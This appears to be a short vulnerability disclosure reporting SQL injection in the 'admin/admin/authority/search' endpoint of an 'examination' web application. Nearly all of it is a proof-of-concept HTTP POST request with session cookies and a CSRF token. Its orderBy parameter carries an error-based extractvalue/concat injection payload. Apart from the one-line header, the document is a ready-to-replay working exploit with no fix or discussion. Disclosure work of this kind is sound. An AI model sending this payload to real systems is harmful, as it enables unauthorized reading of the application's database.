admin/admin/authority/search has sql injection vulnerability

[qbz95aaa]

Vulnerability Product:examination Vulnerability type:sql injection Vulnerability Details：admin/admin/authority/search URL admin/admin/authority/search

poc

POST /admin/admin/authority/search HTTP/1.1
Host: 192.168.3.129:8092
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 975
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: ace_settings=%7B%22sidebar-collapsed%22%3A-1%7D; Hm_lvt_d3b3b1b968a56124689d1366adeacf8f=1678157952; Hm_lpvt_d3b3b1b968a56124689d1366adeacf8f=1678169014; PHPSESSID=s0dfimdr2smjmr3074qpav8po2; _admin=90cb44057f6077d07dc09f747754e4ea1023f1d289f128c441138467bbf77bb3a%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22_admin%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22tGaaJtNH3SXtUEJtA6LIgNb0LQPEjste%22%2C2592000%5D%22%3B%7D; _csrf=d2ae05f533b7d5d759466c965771950e3a44d9703c618e14b02f805ca2430034a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%222YAZrBa_nRKs7CoKBIVaKhRQvAAV1_Up%22%3B%7D
Origin: http://192.168.3.129:8092
Referer: http://192.168.3.129:8092/admin/admin/authority/index
X-Csrf-Token: 2UYjigTRJJSgdpRzR1Ziht5RjECmSp-frEnZbnTCJSfrH2LQdpNFy84k3wBwFQ3NnBjaIe0izc7aCJg4RZ1wVw==
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

bRegex=false&bRegex_0=false&bRegex_1=false&bRegex_2=false&bRegex_3=false&bRegex_4=false&bRegex_5=false&bRegex_6=false&bRegex_7=false&bRegex_8=false&bSearchable_0=true&bSearchable_1=true&bSearchable_2=true&bSearchable_3=true&bSearchable_4=true&bSearchable_5=true&bSearchable_6=true&bSearchable_7=true&bSearchable_8=true&bSortable_0=false&bSortable_1=true&bSortable_2=false&bSortable_3=false&bSortable_4=false&bSortable_5=false&bSortable_6=true&bSortable_7=true&bSortable_8=false&iColumns=9&iDisplayLength=10&iDisplayStart=0&iSortCol_0=6&iSortingCols=1&mDataProp_0=&mDataProp_1=type&mDataProp_2=name&mDataProp_3=name&mDataProp_4=description&mDataProp_5=rule_name&mDataProp_6=created_at&mDataProp_7=updated_at&mDataProp_8=&params%5BorderBy%5D=extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281349049144%29%29%29&sColumns=%2C%2C%2C%2C%2C%2C%2C%2C&sEcho=1&sSearch=&sSearch_0=&sSearch_1=&sSearch_2=&sSearch_3=&sSearch_4=&sSearch_5=&sSearch_6=&sSearch_7=&sSearch_8=&sSortDir_0=desc